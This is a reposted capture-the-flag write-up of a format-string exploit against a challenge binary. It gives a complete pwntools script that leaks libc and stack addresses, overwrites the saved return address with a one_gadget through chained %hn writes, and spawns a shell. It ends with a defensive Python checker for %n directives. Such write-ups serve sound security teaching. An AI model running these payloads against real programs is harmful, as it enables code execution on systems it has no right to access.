[Screenshots: vmmap, stack, retaddr]
First leak every address that can be leaked: the current stack address and a libc address.
Then perform the address writes with the following commands:
# Here we only need to overwrite the low two bytes of the value at offset 12 (the pointer to the slot at offset 25)
debug()
offset0 = ret&0xffff
payload = '%'+str(offset0)+'c%12$hnxxxx\x00'
p.sendline(payload)
p.recvuntil('xxxx')
debug()
# Overwrite the low two bytes of the value at offset 25 (now the return-address slot) with the low half of one_gadget
offset1 = one&0xffff
payload = '%'+str(offset1) +'c%25$hnxxxx\x00'
p.sendline(payload)
p.recvuntil('xxxx')
debug()
# What gets modified is always the value the pointer points to, never the pointer slot itself
#############################################
# Point the slot at offset 25 to ret+2, then write the next two bytes of one_gadget there
payload = '%'+str(offset0+2)+'c%12$hnxxxx\x00'
p.sendline(payload)
p.recvuntil('xxxx')
debug()
offset2 = 0xffff&(one>>16)
payload = '%'+str(offset2) +'c%25$hnxxxx\x00'
p.sendline(payload)
p.recvuntil('xxxx')
Modification process (screenshots): before modification, first modification, second modification, third modification
Note!!! Each write modifies the value that the two-level pointer points to; the target cannot be modified directly.
from pwn import *
from LibcSearcher import *

p = process('./pwn')
#p = remote('neepusec.club',18757)
elf = ELF('./pwn')
context.log_level = 'debug'

def debug():
    gdb.attach(p)
    pause()

payload = '\x00'
p.sendlineafter(':\n',payload)
# Leak: offset 23 holds the return into __libc_start_main, offset 8 holds a stack pointer
p.send('aaaa%23$pbbbb%8$p')
p.recvuntil('aaaa0x')
__libc_start_main = int(p.recv(12),16)-231
log.success('__libc_start_main===>'+hex(__libc_start_main))
libc = LibcSearcher('__libc_start_main',__libc_start_main)
libc_base = __libc_start_main - libc.dump('__libc_start_main')
log.success('libc_base==>'+hex(libc_base))
one = [0x4f3d5,0x4f432,0x10a41c]
one = one[0]+libc_base
log.success('one==>'+hex(one))
p.recvuntil('bbbb0x')
# The leaked stack pointer plus 8 is the address of the saved return address
ret = int(p.recv(12),16) + 8
log.success('ret==>'+hex(ret))
debug()
# First write: make the slot at offset 25 point at ret (low two bytes only)
offset0 = ret&0xffff
payload = '%'+str(offset0)+'c%12$hnxxxx\x00'
p.sendline(payload)
p.recvuntil('xxxx')
debug()
# Second write: low two bytes of one_gadget into ret
offset1 = one&0xffff
payload = '%'+str(offset1) +'c%25$hnxxxx\x00'
p.sendline(payload)
p.recvuntil('xxxx')
debug()
# Third write: move the slot at offset 25 to ret+2, then write the next two bytes of one_gadget
payload = '%'+str(offset0+2)+'c%12$hnxxxx\x00'
p.sendline(payload)
p.recvuntil('xxxx')
debug()
offset2 = 0xffff&(one>>16)
payload = '%'+str(offset2) +'c%25$hnxxxx\x00'
p.sendline(payload)
p.recvuntil('xxxx')
debug()
p.sendline('ls')
p.interactive()
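As an added defender-side example (not part of the original writeup), the Python below walks a format string the way printf does and reports every %n-family directive: the argument slot it dereferences, the store width implied by the length modifier, and the character count that becomes the stored value. It shows why a payload of the form '%<N>c%12$hn' is a two-byte store of N mod 65536 through slot 12, and doubles as an input-validation check. It assumes an LP64 (x86-64 Linux) target, which the one_gadget offsets above also imply.

```python
import re

# One printf conversion specification: %[argpos$][flags][width][.precision][length]conversion
SPEC = re.compile(
    r'%(?:(?P<pos>\d+)\$)?(?P<flags>[-+ #0]*)(?P<width>\d+|\*)?'
    r'(?:\.(?P<prec>\d+|\*))?(?P<len>hh|h|ll|l|q|j|z|t|L)?(?P<conv>[diouxXeEfFgGaAcspn%])')

# Bytes stored by %n per length modifier; assumption: LP64 target (x86-64 Linux)
N_SIZES = {'hh': 1, 'h': 2, '': 4, 'l': 8, 'll': 8, 'q': 8, 'j': 8, 'z': 8, 't': 8}


def analyze_format(fmt):
    """Return one dict {arg, size, value, exact} per %n-family directive in fmt.

    value is the character count printf would store, masked to the store size;
    exact is False once a directive whose length depends on its argument
    (%s, %p, %d, ...) has been seen, since only literal text and %c have a
    data-independent length."""
    writes = []
    chars = 0          # characters emitted so far
    exact = True
    next_arg = 1       # next sequential slot for directives without N$
    pos = 0
    for m in SPEC.finditer(fmt):
        chars += m.start() - pos          # literal text before this directive
        pos = m.end()
        conv = m.group('conv')
        if conv == '%':
            chars += 1
            continue
        if m.group('width') == '*' or m.group('prec') == '*':
            next_arg += 1                 # '*' consumes an int argument; assumes no '*m$' form
            exact = False
        arg = int(m.group('pos')) if m.group('pos') else next_arg
        if not m.group('pos'):
            next_arg += 1
        if conv == 'n':
            size = N_SIZES[m.group('len') or '']
            writes.append({'arg': arg, 'size': size,
                           'value': chars & ((1 << (8 * size)) - 1), 'exact': exact})
            continue
        w = m.group('width')
        width = int(w) if w and w != '*' else 0
        if conv == 'c':
            chars += max(width, 1)        # %c pads to exactly the field width
        else:
            chars += width                # lower bound; real length depends on the argument
            exact = False
    return writes


def is_safe_as_format(user_input):
    """True only if the string carries no %n-family directive; the real fix is printf("%s", s)."""
    return not analyze_format(user_input)
```

Run over the payloads in this writeup, the leak string '%23$p...%8$p' yields no writes, while '%55528c%12$hn' reports a 2-byte store of 0xd8e8 through argument slot 12.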
Reposted from: http://htugf.baihongyu.com/